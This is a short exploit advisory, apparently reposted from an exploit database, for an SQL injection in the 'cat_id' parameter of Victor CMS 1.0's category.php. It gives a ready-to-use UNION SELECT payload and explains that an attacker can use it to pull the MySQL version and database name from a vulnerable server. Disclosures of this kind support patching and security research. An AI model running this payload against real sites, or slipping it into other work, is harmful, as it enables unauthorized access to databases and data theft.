# Exploit Title: Victor CMS 1.0 – ‘cat_id’ SQL Injection
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10

Description: The GET parameter ‘category.php?cat_id=’ is vulnerable to SQL Injection

Payload: UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+–


By exploiting the SQL Injection vulnerability by using the mentioned payload, an attacker will be able to retrieve the database name and version of mysql running on the server.

Source link

Write a comment:

Your email address will not be published.